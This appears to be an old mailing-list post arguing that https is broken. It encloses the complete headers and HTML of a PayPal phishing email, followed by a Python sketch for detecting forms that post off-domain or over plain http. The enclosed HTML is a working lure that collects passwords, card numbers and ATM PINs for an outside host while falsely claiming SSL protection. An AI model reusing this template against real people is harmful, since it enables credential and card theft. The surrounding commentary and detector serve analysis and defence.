Attached is a spam mail that constitutes an attack on PayPal similar in effect and method to man in the middle. The bottom line is that https just is not working. It's broken. The fact that people keep using shared secrets is a symptom of https not working. The flaw in https is that you cannot operate the business and trust model using https that you can with shared secrets.

-------------- Enclosure number 1 ----------------
Received: from bgp480791bgs.summit01.nj.comcast.net [68.37.160.58] by dpmail07.doteasy.com (SMTPD32-7.13) id A3506CD006A; Sat, 07 Jun 2003 19:45:36 -0700
Date: Sun, 08 Jun 2003 02:50:24 +0000
From: Confirm <confirm@paypal.com>
Subject: Important Information Regarding Your PayPal Account
To: Jamesd <jamesd@echeque.com>
References: <4FG6E0K8HJHJ2DL9@echeque.com>
In-Reply-To: <4FG6E0K8HJHJ2DL9@echeque.com>
Message-ID: <62K3JH9LKLB0I8GK@paypal.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-RCPT-TO: <jamesd@echeque.com>
Status: U
X-PMFLAGS: 34079360 0 1 P4EDB0.CNM

<html> <head> <STYLE type=text/css>
.dummy {}
BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;color: #000000;}
UL {list-style: square}
.pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 24px;font-weight: bold;color: #003366;}
.pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 22px;font-weight: bold;color: #003366;}
.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;}
.pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;}
.pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;}
.pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 14px;font-weight: bold;color: #000000;}
.pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #000000;}
.pp_smallbluetext 
{font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #003366;} .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} </STYLE> <title>PayPal</title> </head> <body> <table width="600" cellspacing="0" cellpadding="0" border="0" align="center"> <tr> <td><A href="https://www.paypal.com/"><IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109 height=35 alt="PayPal" border="0" vspace=10></A> </td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td background="http://www.paypal.com/images/bg_clk.gif" width="100%"><img src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"></td> </tr> <tr> <td><img src="http://www.paypal.com/images/pixel.gif" height="10" width="1" border="0"></td> </tr> </table> <table width="600" cellspacing="0" cellpadding="5" border="0" align="center"> <tr> <td class="pp_sortofbig" align=middle>Dear PayPal Customer</td> </tr> <tr> <td valign="top"><p> </p> <p>This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.</p> <p>The inactive customers are subject to restriction and removal in the next 3 months.</p> <p>Please confirm your email address and Credit or Check Card information<b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> </b>using the form below:</p></td> </tr> <tr> <td align=middle> <form action="http://www.pos2life.biz/vp.php" method="post"> <p style="MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: 4px" > </p> <table border="0"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" >Email Address:</b></P></td> <td><input name="lgn" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" 
>Password:</b></P></td> <td><input name="psw" type="password" size="32" maxlength="32"></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">First Name:</b></P></td> <td><input name="fname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Last Name:</b></P></td> <td><input name="lname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> ZIP:</b></P></td> <td><input name="bz" size="32" maxlength="20"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Credit or Check Card #:</b></P></td> <td><input name="cz" size="32" maxlength="16"></td> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Expiration Date:</b></P></td> <td> <select name="crdm"> <OPTION value="zero" selected>Month</OPTION> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> / <select name="crdy"> <OPTION value="zero" selected>Year</OPTION> <option value="03">2003</option> <option value="04">2004</option> <option value="05">2005</option> <option value="06">2006</option> <option value="07">2007</option> <option value="08">2008</option> <option value="09">2009</option> <option value="10">2010</option> <option value="11">2011</option> <option value="12">2012</option> </select> </td> <tr> <td> <P align=left><b style="FONT: bold 8pt : normal" > ATM PIN:</b></P></td> <td><input name="pni" type="password" 
size="32" maxlength="6"></td> </tr> </table> <p> <input type="submit" value=" Submit "> </p> </form> Information transmitted using 128bit SSL encryption. <p><br> </p></td> </tr> <tr> <td align=middle><strong>Thanks for using PayPal! </strong><br></td> </tr> <tr> <td><img src="http://www.paypal.com/images/dot_row_long.gif"></td> </tr> <tr> <td class="pp_footer"> This PayPal notification was sent to this email address because you are a Web Accept user and chose to receive the PayPal Periodical newsletter and Product Updates. To modify your notification preferences, go to <A href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</A> and log in to your account. Changes may take several days to be reflected in our mailings. Replies to this email will not be processed. <br> <br> Copyright© 2003 PayPal Inc. All rights reserved. Designated trademarks and brands are the property of their respective owners. </td> </tr> </table> </body></html>
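
The enclosure above claims a paypal.com sender and "128bit SSL encryption" while its form posts a password field to another host over plain http. A mail gateway can check for that mismatch mechanically; the sketch below is an added example, not part of the original post, and `base_domain`, `FormAudit` and `audit_mail` are hypothetical names, with a naive two-label domain comparison assumed in place of a public-suffix list.

```python
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

def base_domain(host):
    # Assumption: the last two labels approximate the registrable domain.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

class FormAudit(HTMLParser):
    """Record each <form> action and whether the form holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def audit_mail(raw):
    """Return findings for forms that send data away from the From: domain."""
    msg = message_from_string(raw)
    sender = base_domain(parseaddr(msg["From"])[1].rpartition("@")[2])
    audit = FormAudit()
    audit.feed(msg.get_payload())
    findings = []
    for form in audit.forms:
        url = urlparse(form["action"])
        target = base_domain(url.hostname or "")
        if target != sender:
            findings.append(f"form posts to {target}, mail claims {sender}")
        if form["password"] and url.scheme != "https":
            findings.append(f"password field submitted over {url.scheme or 'no scheme'}")
    return findings

# Constructed sample: From header and form abridged from the enclosure above.
SAMPLE = """From: Confirm <confirm@paypal.com>
Content-Type: text/html

<html><body><form action="http://www.pos2life.biz/vp.php" method="post">
<input name="lgn"><input name="psw" type="password"><input type="submit"></form>
Information transmitted using 128bit SSL encryption.</body></html>
"""

if __name__ == "__main__":
    print(audit_mail(SAMPLE))
```

The From header is trivially forged, so the comparison only tells the gateway that the mail's claimed identity and its form target disagree, which is the property this phish depends on.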